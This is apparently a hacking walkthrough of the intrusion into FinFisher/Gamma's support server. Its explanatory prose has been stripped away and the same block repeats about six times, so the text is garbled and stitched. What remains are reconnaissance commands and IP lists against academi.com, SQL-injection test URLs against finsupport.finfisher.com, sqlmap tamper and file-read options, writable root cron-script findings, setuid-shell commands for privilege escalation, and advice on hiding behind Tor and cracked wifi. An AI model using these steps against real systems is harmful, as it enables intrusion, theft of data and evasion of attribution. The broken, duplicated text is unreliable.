https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
